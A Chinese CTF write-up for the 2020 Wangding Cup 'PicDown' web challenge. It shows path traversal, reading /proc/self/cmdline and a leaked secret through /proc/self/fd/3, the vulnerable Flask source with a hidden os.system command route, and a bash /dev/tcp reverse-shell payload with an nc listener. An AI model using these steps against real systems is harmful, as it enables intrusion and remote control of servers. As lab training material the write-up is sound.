[网鼎杯 2020 白虎组]PicDown

---

首页长这样

朴实无华.jpg

/page?url=../flag

然后就拿到flag了

看wp还有个预期解

获取进程的cmdline

/page?url=/proc/self/cmdline

python2 app.py

/page?url=app.py

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

使用open打开了，但是没有close，可以使用文件描述符读取

默认创建了三个文件描述符，stdin、stdout和stderr

所以secret.txt的fd应该是3

/page?url=/proc/self/fd/3

kE2V+hdkhIPOUAJKRtlII96sVqUxsIZiOhjWOqcRr24=

反弹shell

no_one_know_the_manager?key=kE2V+hdkhIPOUAJKRtlII96sVqUxsIZiOhjWOqcRr24=&shell=bash -c "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/7777 0>&1"

查询参数要进行url编码

nc -lvp 7777

cat /flag

flag{5dbf6e32-aa1e-4f39-b328-425144e25c25}

#Web #linux #proc #文件描述符 #反弹shell